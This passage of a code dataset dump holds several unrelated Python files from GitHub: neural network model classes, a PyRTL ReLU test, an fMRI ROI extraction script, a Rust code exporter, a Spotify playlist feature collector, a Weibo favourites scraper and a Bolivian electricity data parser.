dict(dict(ZeroMax=True),**reweight_kwargs)\n\n \n def f(x):\n mu = mu_in[:]\n mu[mu_idx] = x\n c = ref.reweight(mu,**reweight_kwargs)\n f.lnpi = c\n \n Omegas = c.Omegas_phaseIDs()\n \n return Omegas[IDs[0]] - Omegas[IDs[1]]\n\n\n xx,r = optimize.brentq(f,a,b,full_output=True,**kwargs)\n\n r.residual = f(xx)\n\n if full_output:\n return f.lnpi,r\n else:\n return f.lnpi\n\n","repo_name":"dwsideriusNIST/lnPi","sub_path":"lnPi/binodal.py","file_name":"binodal.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3512433194","text":"import torch.nn as nn\nimport math\nimport torch\n\nclass BiLSTM(nn.Module):\n def __init__(self, input_size, hidden_size=128, dropout_rate=0.1, layer_num=1):\n super(BiLSTM, self).__init__()\n self.hidden_size = hidden_size\n if layer_num == 1:\n self.bilstm = nn.LSTM(input_size, hidden_size // 2, layer_num, batch_first=True, bidirectional=True)\n\n else:\n self.bilstm = nn.LSTM(input_size, hidden_size // 2, layer_num, batch_first=True, dropout=dropout_rate,\n bidirectional=True)\n self.init_weights()\n\n def init_weights(self):\n for p in self.bilstm.parameters():\n if p.dim() > 1:\n nn.init.normal_(p)\n p.data.mul_(0.01)\n else:\n p.data.zero_()\n # This is the range of indices for our forget gates for each LSTM cell\n p.data[self.hidden_size // 2: self.hidden_size] = 1\n\n def forward(self, x, lens):\n '''\n 
:param x: (batch, seq_len, input_size)\n :param lens: (batch, )\n :return: (batch, seq_len, hidden_size)\n '''\n ordered_lens, index = lens.sort(descending=True)\n ordered_x = x[index]\n\n packed_x = nn.utils.rnn.pack_padded_sequence(ordered_x, ordered_lens.cpu(), batch_first=True)\n packed_output, (ht, ct) = self.bilstm(packed_x)\n output, _ = nn.utils.rnn.pad_packed_sequence(packed_output, batch_first=True)\n\n recover_index = index.argsort()\n recover_output = output[recover_index]\n\n sent_emb = ht[-2:].permute(1, 0, 2).reshape(len(lens), -1)\n sent_emb = sent_emb[recover_index] # (num_layers * 2, batch, hidden_size//2)\n return recover_output, sent_emb\n\n\nclass RNN(nn.Module):\n def __init__(self, vocab_size, num_classes, embed_size, hidden_size, dropout_rate, num_layers,\n pretrained_embed=None, freeze=False):\n super(RNN, self).__init__()\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n\n if pretrained_embed is not None:\n self.embed = nn.Embedding.from_pretrained(pretrained_embed, freeze)\n else:\n self.embed = nn.Embedding(vocab_size, embed_size)\n\n self.rnn = BiLSTM(embed_size, hidden_size, dropout_rate, num_layers)\n self.fc = nn.Linear(hidden_size, num_classes)\n # self.dropout = nn.Dropout(dropout_rate)\n\n self.init_weights()\n\n def init_weights(self):\n std = 1.0 / math.sqrt(self.hidden_size)\n for w in self.parameters():\n w.data.uniform_(-std, std)\n\n def forward(self, x, lens):\n embeddings = self.embed(x)\n output, sent_emb = self.rnn(embeddings, lens)\n # out = self.fc(self.dropout(sent_emb))\n out = self.fc(sent_emb)\n return out\n\nclass HiddenLayer(nn.Module):\n def __init__(self, input_size, output_size):\n super(HiddenLayer, self).__init__()\n self.fc = nn.Linear(input_size, output_size)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n return self.relu(self.fc(x))\n\n\nclass MLP(nn.Module):\n def __init__(self, hidden_size=100, num_layers=1, activation_layer=\"sigmoid\", input_dim = 1):\n super(MLP, self).__init__()\n self.activation_layer = activation_layer\n self.first_hidden_layer = HiddenLayer(input_dim, hidden_size)\n self.rest_hidden_layers = nn.Sequential(*[HiddenLayer(hidden_size, hidden_size) for _ in range(num_layers - 1)])\n self.output_layer = nn.Linear(hidden_size, 1)\n\n def forward(self, x):\n x = self.first_hidden_layer(x)\n x = self.rest_hidden_layers(x)\n x = self.output_layer(x)\n return torch.sigmoid(x)\n","repo_name":"SumilerGAO/SunGen","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"34"} +{"seq_id":"187504555","text":"import pyrtl\nimport random\n\n# def relu(vec):\n# \tfor i in vec:\n# \t\twith pyrtl.conditional_assignment:\n# \t\t\twith i[0] == 1:\n# \t\t\t\ti.next |= 0\n# \t\t\twith pyrtl.otherwise:\n# \t\t\t\tpass\n# \treturn vec\ndef relu(vec):\n # assert offset <= 24\n # d[-1] of 2's complement is the signed bit\n # if 0 -> falsecase (positive)\n # if 1 -> truecase (negative)\n return [pyrtl.select(d[-1], falsecase=d, truecase=pyrtl.Const(0, len(d))) for d in vec]\n# Now all we need to do is call \"sim.step\" to simulate each clock cycle of our\n# design. We just need to pass in some input each cycle which is a dictionary\n# mapping inputs (the *names* of the inputs, not the actual Input instances)\n# and a value for that signal each cycle. In this simple example we\n# can just specify a random value of 0 or 1 with python's random module. 
We\n# call step 15 times to simulate 15 cycles.\n\n# for cycle in range(15):\n# sim.step({\n# 'a': random.choice([0, 1]),\n# 'b': random.choice([0, 1]),\n# 'c': random.choice([0, 1])\n# })\n\nreg_vec = [pyrtl.Register(32) for i in range(0, 8)]\ninputs = [pyrtl.Input(32, 'input_{}'.format(i)) for i in range(0, 8)]\ntest_dict = {\n\t\t'input_0': 3,\n\t\t'input_1': -39 & 0xFFFFFFFF,\n\t\t'input_2': 17,\n\t\t'input_3': 7,\n\t\t'input_4': -42 & 0xFFFFFFFF,\n\t\t'input_5': -18 & 0xFFFFFFFF,\n\t\t'input_6': 37,\n\t\t'input_7': -6 & 0xFFFFFFFF\n\t\t}\noutput_orig = [pyrtl.Output(32, 'out_orig_{}'.format(i)) for i in range(0, 8)]\noutput_relu = [pyrtl.Output(32, 'out_relu_{}'.format(i)) for i in range(0, 8)]\n\nfor index,reg in enumerate(reg_vec):\n\t# inputs[index] <<= test_dict[index]\n\treg.next <<= inputs[index]\n\toutput_orig[index] <<= reg\nrelu_func_out = relu(reg_vec)\nfor i, index in enumerate(output_relu):\n\tindex <<= relu_func_out[i]\n\nsim_trace = pyrtl.SimulationTrace()\nsim = pyrtl.Simulation(tracer=sim_trace)\n\nfor cycle in range(35):\n\tsim.step(test_dict)\n\n\n# Now all we need to do is print the trace results to the screen. Here we use\n# \"render_trace\" with some size information.\nprint('--- ReLU Simulation ---')\nsim_trace.render_trace(symbol_len=5, segment_size=5)\n\n# a_value = sim.inspect(a)\n# print(\"The latest value of a was: \" + str(a_value))\n\n# --- Verification of Simulated Design ---------------------------------------\n\n# Now finally, let's check the trace to make sure that sum and carry_out are actually\n# the right values when compared to a python's addition operation. Note that\n# all the simulation is done at this point and we are just checking the wave form\n# but there is no reason you could not do this at simulation time if you had a\n# really long running design.\n\n# for cycle in range(15):\n# \t# Note that we are doing all arithmetic on values NOT wirevectors here.\n# \t# We can add the inputs together to get a value for the result\n# \tadd_result = (sim_trace.trace['a'][cycle] +\n# \t\t\t\t sim_trace.trace['b'][cycle] +\n# \t\t\t\t sim_trace.trace['c'][cycle])\n# \t# We can select off the bits and compare\n# \tpython_sum = add_result & 0x1\n# \tpython_cout = (add_result >> 1) & 0x1\n\n# You made it to the end!\nexit(0)\n","repo_name":"saurabhhgupta/OpenTPU","sub_path":"testing/relu_test.py","file_name":"relu_test.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}{"seq_id":"37984420168","text":"import pandas as pd\nimport numpy as np\nfrom nilearn import image\nfrom nilearn.masking import apply_mask\n\n\n# Set input and output paths\ndata_dir = './Pilot_N3'\nROIs_dir = f'{data_dir}/ROIs'\nfmri_prep = f'{data_dir}/derivatives/fmri_prep'\nfstlvl_dir = f'{data_dir}/derivatives/fmri_prep/firstlvl_out/contrast_files'\ndf_out = f'{data_dir}/data'\n\n# Load in binarized ROIs (these are created using the provided .txt file)\n# L/R NAcc is 50thr Harvard-Oxford Subcortical mask\n# L/R Ant Insula is the 50thr Harvard-Oxford Cortical mask that is masked by an anterior mask downloaded from neurosynth (thresh 8)\n# Thus, remaining part of the Harvard-Oxford Insula is only the anterior portion overlapping with neurosynth mask\nl_nacc = image.load_img(f'{ROIs_dir}/Left_NAcc.nii.gz')\nr_nacc = image.load_img(f'{ROIs_dir}/Right_NAcc.nii.gz')\nr_ains = image.load_img(f'{ROIs_dir}/Right_AnteriorInsula.nii.gz')\nl_ains = 
image.load_img(f'{ROIs_dir}/Left_AnteriorInsula.nii.gz')\n\n# List of Subjects and Runs\nsubj = [\"31\",\"21\"]\nruns = [\"01\", \"02\"]\n\n# Contrasts (beta maps) to work through;\n# Differentiated by uppercase, LS = Large+Small; L = Large;\n# loss = 'Don't Lose', gain = 'Win', Neut = 'No Money at Stake'\ncontrasts = [\"Lgain-Neut\", \"LSgain-Neut\", \"Lgain-Lloss\",\n \"Lloss-Neut\", \"LSloss-Neut\", \"Lloss-Lgain\"]\n\n# setting up ROI label and variable name for nifti file\nrois = {\"L-Ins\": l_ains,\n \"R-Ins\": r_ains,\n \"L-NAcc\": l_nacc,\n \"R-NAcc\": r_nacc}\n\n\n# Creating empty lists where the mean beta values and item names are saved\nbeta_vals = []\nbeta_items = []\n\n# loop and extract the mean beta estimate by masking each img (beta map) with each mask (roi).\n# the '*beta.nii.gz' image is the 'effect_size' output file from nilearn's firstlevel compute_contrast()\nfor s in subj:\n for r in runs:\n for c in contrasts:\n for roi,img in rois.items():\n beta_map = image.load_img(f'{fstlvl_dir}/sub-{s}_ses-01_task-mid_run-{r}_contrast_{c}_beta.nii.gz')\n beta_mean = np.mean(apply_mask(imgs=beta_map, mask_img=img))\n beta_vals.append(beta_mean)\n beta_items.append(f'sub-{s}_{r}_{c}_{roi}')\n\n# After the loop, which creates a row for each subject, run, contrast, roi combination, reshape the data into wide format\n# wide format conversion: subjects remain as rows; columns are run_contrast_roi, with row values giving the beta estimate for each contrast\ndf = pd.DataFrame({'Items': beta_items,\n 'Values': beta_vals})\ndf[['subj','run', 'contrast','roi']] = df.Items.str.split(\"_\",expand=True)\ndf = df.drop(columns=['Items'])\ndf = df.pivot_table(index=\"subj\",\n columns=[\"run\",\"contrast\",\"roi\"],\n values =\"Values\")\n\n# Since the variables are in stacked format, loop through x,y,z (3 stacked variables) to combine and produce the {run_contrast_roi} column names\ndf.columns = [f'{x}_{y}_{z}' for x,y,z in df.columns]\n# export signal intensity df into .csv\ndf.to_csv(f'{df_out}/ROImeansignal.csv')\n\n# After calculating ROI estimates, calculate % signal coverage for each ROI (to exclude ROIs with excess dropout)\nroi_vals = []\nroi_items = []\nfor s in subj:\n for r in runs:\n for roiname,roi_img in rois.items():\n brain = image.load_img(f'{fmri_prep}/sub-{s}/ses-1/func/sub-{s}_ses-1_task-mid_run-{r}_*brain_mask.nii.gz')\n brain_roimask = apply_mask(imgs=brain, mask_img=roi_img)\n roi = roi_img.get_fdata()\n brain_vox = brain_roimask.sum()\n roi_vox = roi.sum()\n BrRo_perc = brain_vox/roi_vox\n roi_vals.append(BrRo_perc)\n roi_items.append(f'sub-{s}_{r}_{roiname}')\n\n# Do the same as for the mean signal intensity df, but for the voxel overlap\nROIvox_df = pd.DataFrame({'Items': roi_items,\n 'Values': roi_vals})\nROIvox_df[['subj','run', 'roiname']] = ROIvox_df.Items.str.split(\"_\",expand=True)\nROIvox_df = ROIvox_df.drop(columns=['Items'])\nROIvox_df = ROIvox_df.pivot_table(index=\"subj\",\n columns=[\"run\",\"roiname\"],\n values =\"Values\")\n\nROIvox_df.columns = [f'{x}_{y}' for x,y in ROIvox_df.columns]\n# export voxel overlap df into .csv\nROIvox_df.to_csv(f'{df_out}/ROIvMaskVoxels.csv')\n","repo_name":"demidenm/Multisample_MIDMeasureStruct","sub_path":"Stage1_Code/BetaMap_ROI.py","file_name":"BetaMap_ROI.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}{"seq_id":"31588646541","text":"from compile import VariableType, VariableRefType\n\ndef to_initial_caps(snake_str):\n components = 
snake_str.split(\"_\")\n return \"\".join(x.title() for x in components)\n\ndef display(contract):\n indent = \" \" * 4\n\n print(r\"\"\"use super::vm::{ZKVirtualMachine, CryptoOperation, AllocType, ConstraintInstruction, VariableIndex, VariableRef};\nuse bls12_381::Scalar;\n\npub fn load_params(params: Vec) -> Vec<(VariableIndex, Scalar)> {\"\"\")\n params = [(symbol, var) for symbol, var in contract.alloc.items() if var.is_param]\n print(\"%sassert_eq!(params.len(), %s);\" % (indent, len(params)))\n print(\"%slet mut result = vec![(0, Scalar::zero()); %s];\" % (\n indent, len(params)))\n for i, (symbol, variable) in enumerate(params):\n assert variable.is_param\n print(\"%s// %s\" % (indent, symbol))\n print(\"%sresult[%s] = (%s, params[%s]);\" % (\n indent, i, variable.index, i))\n print(\"%sresult\" % indent)\n print(\"}\\n\")\n\n print(r\"\"\"pub fn load_zkvm() -> ZKVirtualMachine {\n ZKVirtualMachine {\n constants: vec![\"\"\")\n\n constants = list(contract.constants.items())\n constants.sort(key=lambda obj: obj[1][0])\n constants = [(obj[0], obj[1][1]) for obj in constants]\n for symbol, value in constants:\n print(\"%s// %s\" % (indent * 3, symbol))\n assert len(value) == 32*2\n chunk_str = lambda line, n: \\\n [line[i:i + n] for i in range(0, len(line), n)]\n chunks = chunk_str(value, 2)\n # Reverse the endianness\n # We allow literal numbers but rust wants little endian\n chunks = chunks[::-1]\n print(\"%sScalar::from_bytes(&[\" % (indent * 3))\n for i in range(0, 32, 4):\n print(\"%s0x%s, 0x%s, 0x%s, 0x%s,\" % (indent * 4,\n chunks[i], chunks[i + 1], chunks[i + 2], chunks[i + 3]))\n print(\"%s]).unwrap(),\" % (indent * 3))\n\n print(\"%s],\" % (indent * 2))\n print(\"%salloc: vec![\" % (indent * 2))\n\n for symbol, variable in contract.alloc.items():\n print(\"%s// %s\" % (indent * 3, symbol))\n\n if variable.type.name == VariableType.PRIVATE.name:\n typestring = \"Private\"\n elif variable.type.name == VariableType.PUBLIC.name:\n typestring = \"Public\"\n else:\n assert False\n\n print(\"%s(AllocType::%s, %s),\" % (indent * 3, typestring,\n variable.index))\n\n print(\"%s],\" % (indent * 2))\n print(\"%sops: vec![\" % (indent * 2))\n\n def var_ref_str(var_ref):\n if var_ref.type.name == VariableRefType.AUX.name:\n return \"VariableRef::Aux(%s)\" % var_ref.index\n elif var_ref.type.name == VariableRefType.LOCAL.name:\n return \"VariableRef::Local(%s)\" % var_ref.index\n else:\n assert False\n\n for op in contract.ops:\n print(\"%s// %s\" % (indent * 3, op.line))\n args_part = \"\"\n if op.command == \"load\":\n assert len(op.args) == 2\n args_part = \"(%s, %s)\" % (var_ref_str(op.args[0]), op.args[1].index)\n elif op.command == \"debug\":\n assert len(op.args) == 1\n args_part = '(String::from(\"%s\"), %s)' % (\n op.line, var_ref_str(op.args[0]))\n elif op.args:\n args_part = \", \".join(var_ref_str(var_ref) for var_ref in op.args)\n args_part = \"(%s)\" % args_part\n print(\"%sCryptoOperation::%s%s,\" % (\n indent * 3,\n to_initial_caps(op.command),\n args_part\n ))\n\n print(\"%s],\" % (indent * 2))\n print(\"%sconstraints: vec![\" % (indent * 2))\n\n for constraint in contract.constraints:\n args_part = \"\"\n if constraint.args:\n print(\"%s// %s\" % (indent *3, constraint.args_comment()))\n args = constraint.args[:]\n if (constraint.command == \"lc0_add_coeff\" or\n constraint.command == \"lc1_add_coeff\" or\n constraint.command == \"lc2_add_coeff\" or\n constraint.command == \"lc0_add_one_coeff\" or\n constraint.command == \"lc1_add_one_coeff\" or\n constraint.command == 
\"lc2_add_one_coeff\"):\n args[0] = args[0][0]\n args_part = \", \".join(str(index) for index in args)\n args_part = \"(%s)\" % args_part\n print(\"%sConstraintInstruction::%s%s,\" % (\n indent * 3,\n to_initial_caps(constraint.command),\n args_part\n ))\n print(r\"\"\" ],\n aux: vec![],\n params: None,\n verifying_key: None,\n }\n}\"\"\")\n\n","repo_name":"narodnik/sapvi","sub_path":"scripts/compile_export_rust.py","file_name":"compile_export_rust.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"30736381951","text":"\"\"\"\r\nScript créant un jeu de données des pistes contenues dans différentes playlists.\r\nPour chaque chanson, ses caractéristiques audio sont ajoutées.\r\n\"\"\"\r\n\r\nimport spotipy\r\nimport spotipy.util as util\r\nimport pandas as pd\r\n\r\nfrom spotipy.oauth2 import SpotifyClientCredentials\r\n\r\n# Dictionnaire de playlist\r\nplaylists = [\r\n # Classique\r\n ## Classical Essentials - 101 titres\r\n {\"Genre\": \"Classique\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWWEJlAGA9gs0\"},\r\n ## Piano 100: Spotify Picks - 100 titres\r\n {\"Genre\": \"Classique\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXah8e1pvF5oE\"},\r\n # Jazz\r\n ## Jazz Collection - 50 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWZx4L0CjnaL9\"},\r\n ## Late Night Jazz - 58 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX4wta20PHgwo\"},\r\n ## Jazz Classics - 70 titres\r\n {\"Genre\": \"Jazz\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXbITWG1ZJKYt\"},\r\n # Blues\r\n ## Acoustic Blues - 64 titres\r\n {\"Genre\": \"Blues\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX2iUghHXGIjj\"},\r\n # Electro\r\n ## New Electro - 50 titres\r\n {\"Genre\": \"Electro\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWTIfBdh7WtFL\"},\r\n ## Dance Hits - 157 titres\r\n {\"Genre\": \"Electro\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX0BcQWzuB7ZO\"},\r\n # Rock\r\n ## Légendes du Rock - 50 titres\r\n {\"Genre\": \"Rock\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWXTHBOfJ8aI7\"},\r\n ## Indie Rock Club - 50 titres\r\n {\"Genre\": \"Rock\", \"URL\":\" https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX35DWKgAk2B5\"},\r\n ## Rock Classics - 130 titres\r\n {\"Genre\": \"Rock\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWXRqgorJj26U\"},\r\n # Indie\r\n ## Indie Station - 50 titres\r\n {\"Genre\": \"Indie\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX924zU1IARaD\"},\r\n ## Hot Alternative - 50 titres\r\n {\"Genre\": \"Indie\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWTRqg6ucMOrz\"},\r\n # Pop\r\n ## Pop collection - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYX0SFpLcPgx\"},\r\n ## Today's Top Hits - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXcBWIGoYBM5M\"},\r\n ## Melting Pop - 50 titres\r\n {\"Genre\": \"Pop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYfb7VzTqlBj\"},\r\n ## Hit Rewind - 55 titres\r\n {\"Genre\": \"Pop\", \"URL\": 
\"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX0s5kDXi1oC5\"},\r\n # Metal\r\n ## Metal Essentials - 69 titres\r\n {\"Genre\": \"Metal\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWWOaP4H0w5b0\"},\r\n ## Masters of Metal - 50 titres\r\n {\"Genre\": \"Metal\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX6BrB0kUwSdM\"},\r\n # Hip-Hop\r\n ## Rap Collection - 35 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSCuekGD3tIW\"},\r\n ## Classiques du Rap US - 70 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DXawlg2SZawZf\"},\r\n ## Classiques du Rap Français - 58 titres\r\n {\"Genre\": \"Hip-Hop\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSrqNVMcxGKc\"},\r\n # Folk\r\n ## Classic Acoustic - 86 titres\r\n {\"Genre\": \"Folk\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DX504r1DvyvxG\"},\r\n ## Essential Folk - 94 titres\r\n {\"Genre\": \"Folk\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWVmps5U8gHNv\"},\r\n # RnB\r\n ## Alternative R&B - 54 titres\r\n {\"Genre\": \"RnB\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWSfMe9z89s9B\"},\r\n ## R&B now - 40 titres\r\n {\"Genre\": \"RnB\", \"URL\": \"https://open.spotify.com/user/spotify/playlist/37i9dQZF1DWYfb7VzTqlBj\"}\r\n]\r\n\r\nmyid = 'id'\r\nmysecret = 'secretid'\r\nclient_credentials_manager = SpotifyClientCredentials(client_id=myid, client_secret=mysecret)\r\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\r\n\r\n\r\ndef get_playlist_tracks(username,playlist_id):\r\n results = sp.user_playlist_tracks(username, playlist_id)\r\n tracks = results['items']\r\n while results['next']:\r\n results = sp.next(results)\r\n tracks.extend(results['items'])\r\n return tracks\r\n\r\n\r\ndef get_playlists():\r\n df = pd.DataFrame()\r\n list_songs = []\r\n for playlist in playlists:\r\n print(\"############### \" + str(playlist['Genre']) + \" ###############\")\r\n list_songs = get_playlist_tracks(\"spotify\", str(playlist['URL']))\r\n for song in list_songs:\r\n artist = (str(song['track']['artists'][0]['name']))\r\n title = (str(song['track']['name']))\r\n popularity = (str(song['track']['popularity']))\r\n uri = (str(song['track']['uri']))\r\n print(str(artist) + \" - \" + str(title))\r\n\r\n # Requête des caractéristiques musicales\r\n audio_features = sp.audio_features(uri)[0]\r\n\r\n df = df.append({\"artiste\": artist, \"titre\": title, \"popularite\": popularity, \"uri\": uri, \"genre\": str(playlist['Genre']), **audio_features}, ignore_index=True)\r\n return df\r\n\r\n\r\ndef main():\r\n # Noms ordonnés des colonnes\r\n columns = ['artiste', 'titre', 'popularite', 'genre', 'danceability', 'energy', 'key', 'loudness', 'mode', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'tempo', 'duration_ms', 'time_signature']\r\n df = get_playlists()\r\n df = df[columns]\r\n df.to_excel('export_full.xlsx')\r\n print(df.groupby('genre').count())\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dbeley/spotify-scripts","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2245811724","text":"from selenium.webdriver import Chrome\nfrom bs4 import BeautifulSoup\nimport 
time\nimport sys\n\n\n\nclass Spider:\n def __init__(self,index_url,target_url,page_range):\n self.index_url = index_url\n self.target_url = target_url\n self.page_range = page_range + 1\n self.raw_html = []\n self.boot()\n def boot(self):\n self.driver = Chrome()\n self.driver.start_client()\n self.check_cookie()\n def check_cookie(self):\n from xcookie import cookie_list\n if cookie_list:\n self.driver.get(self.index_url)\n time.sleep(8)\n self.driver.delete_all_cookies()\n print('clear')\n for c in cookie_list:\n self.driver.add_cookie(c)\n print('Done')\n else:\n print('please insert cookie!')\n sys.exit()\n\n def crawl(self):\n for p in range(1,self.page_range):\n full_url = f'{self.target_url}{p}'\n self.driver.get(full_url)\n print(full_url)\n time.sleep(5)\n self.raw_html.append(self.driver.page_source)\n\n\nclass Parser:\n def __init__(self,raw_html):\n self.raw_html = raw_html\n self.info = []\n def parse(self):\n for html in self.raw_html:\n soup = BeautifulSoup(html, 'html.parser')\n text_sel = 'div.WB_detail'\n text = soup.select(text_sel)\n for text_detail in text:\n content = text_detail.get_text()\n clean_text = content.replace(' ','').replace('\\n','')\n self.info.append(clean_text)\n print(self.info)\n\n def save_to_csv(self):\n with open('collection.txt','a+') as f:\n for i in self.info:\n f.write(i)\n f.write('\\n')\n f.write('-'*50)\n f.write('\\n')\n\ns = Spider(index_url='https://www.weibo.com/',target_url='https://www.weibo.com/fav?page=',page_range=2)\ns.crawl()\np = Parser(s.raw_html)\np.parse()\np.save_to_csv()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"keizerkjj/Spider-exercises","sub_path":"s41_oop微博.py","file_name":"s41_oop微博.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43390970429","text":"#!/usr/bin/env python3\n\n# The arrow library is used to handle datetimes\nimport arrow\nimport json\n# The request library is used to fetch content through HTTP\nimport requests\nimport re\n\ntz_bo = 'America/La_Paz'\n\n\ndef extract_xsrf_token(html):\n \"\"\"Extracts XSRF token from the source code of the generation graph page.\"\"\"\n return re.search(r'var ttoken = \"([a-f0-9]+)\";', html).group(1)\n\n\ndef template_response(zone_key, datetime, source):\n return {\n \"zoneKey\": zone_key,\n \"datetime\": datetime,\n \"production\": {\n \"hydro\": 0.0,\n \"unknown\": 0, # Gas + Oil are mixed, so unknown for now\n \"wind\": 0\n },\n \"storage\": {},\n \"source\": source,\n }\n\ndef template_forecast_response(zone_key, datetime, source):\n return {\n \"zoneKey\": zone_key,\n \"datetime\": datetime,\n \"value\": None,\n \"source\": source,\n }\n\n\ndef fetch_production(zone_key='BO', session=None, target_datetime=None, logger=None) -> dict:\n \"\"\"Requests the last known production mix (in MW) of a given country.\"\"\"\n if target_datetime is not None:\n now = arrow.get(target_datetime)\n else:\n now = arrow.now(tz=tz_bo)\n\n r = session or requests.session()\n\n # Define actual and previous day (for midnight data).\n formatted_date = now.format('YYYY-MM-DD')\n\n # initial path for url to request\n url_init = 'https://www.cndc.bo/gene/dat/gene.php?fechag={0}'\n\n # XSRF token for the initial request\n xsrf_token = extract_xsrf_token(r.get(\"https://www.cndc.bo/gene/index.php\").text)\n\n resp = r.get(url_init.format(formatted_date), headers={\n \"x-csrf-token\": xsrf_token\n })\n\n hour_rows = json.loads(resp.text.replace('', ''))[\"data\"]\n 
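# The CNDC rows unpack below as [hour, forecast, total, thermo, hydro,\n # wind, unknown]; a quick sanity check on that assumed layout could be:\n # assert all(len(row) == 7 for row in hour_rows)\n 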
payload = []\n\n for hour_row in hour_rows:\n [hour, forecast, _total, thermo, hydro, wind, _unknown] = hour_row\n\n if target_datetime is None and hour > now.hour:\n continue\n\n if hour == 24:\n timestamp = now.shift(days=1)\n else:\n timestamp = now\n\n if target_datetime is not None and hour < 24:\n timestamp = timestamp.replace(hour=hour-1)\n\n\n hour_resp = template_response(zone_key, timestamp.datetime, \"cndc.bo\")\n hour_resp[\"production\"][\"unknown\"] = thermo\n hour_resp[\"production\"][\"hydro\"] = hydro\n hour_resp[\"production\"][\"wind\"] = wind\n\n payload.append(hour_resp)\n\n return payload\n\n\ndef fetch_generation_forecast(zone_key='BO', session=None, target_datetime=None, logger=None):\n if target_datetime:\n raise NotImplementedError('This parser is not yet able to parse past dates')\n\n now = arrow.now(tz=tz_bo)\n\n r = session or requests.session()\n\n # Define actual and previous day (for midnight data).\n formatted_date = now.format('YYYY-MM-DD')\n\n # initial path for url to request\n url_init = 'https://www.cndc.bo/gene/dat/gene.php?fechag={0}'\n\n # XSRF token for the initial request\n xsrf_token = extract_xsrf_token(r.get(\"https://www.cndc.bo/gene/index.php\").text)\n\n resp = r.get(url_init.format(formatted_date), headers={\n \"x-csrf-token\": xsrf_token\n })\n\n hour_rows = json.loads(resp.text.replace('', ''))[\"data\"]\n payload = []\n\n for hour_row in hour_rows:\n [hour, forecast, _total, _thermo, _hydro, _wind, _unknown] = hour_row\n\n if hour == 24:\n timestamp = now.shift(days=1)\n else:\n timestamp = now\n\n zeroed = timestamp.replace(hour=hour-1, minute=0, second=0, microsecond=0)\n\n hour_resp = template_forecast_response(zone_key, zeroed.datetime, \"cndc.bo\")\n hour_resp[\"value\"] = forecast\n\n payload.append(hour_resp)\n\n return payload\n\nif __name__ == '__main__':\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n print('fetch_production() ->')\n print(fetch_production())\n\n print('fetch_generation_forecast() ->')\n print(fetch_generation_forecast())\n","repo_name":"jorgermurillo/electricitymap","sub_path":"parsers/BO.py","file_name":"BO.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24719675048","text":"import FlatPlugin\nimport os\nimport uuid\nimport csv\nfrom datetime import datetime , timedelta\nimport Helper\nimport DBPlugin\n\ndb=DBPlugin.get_connection()\n\ndef find_flat(cursor,building,flat_number):\n #print(\"Looking for flat {} {}\".format(building,str(flat_number)))\n find_sql = 'SELECT * FROM FLAT WHERE BUILDING=%s AND FLAT_NUMBER=%s'\n cursor.execute(find_sql, (building, flat_number))\n existing = cursor.fetchone();\n return existing\n\ndef add_flats():\n flats=Helper.get_flat_details()\n cursor = db.cursor(dictionary=True)\n for flat in 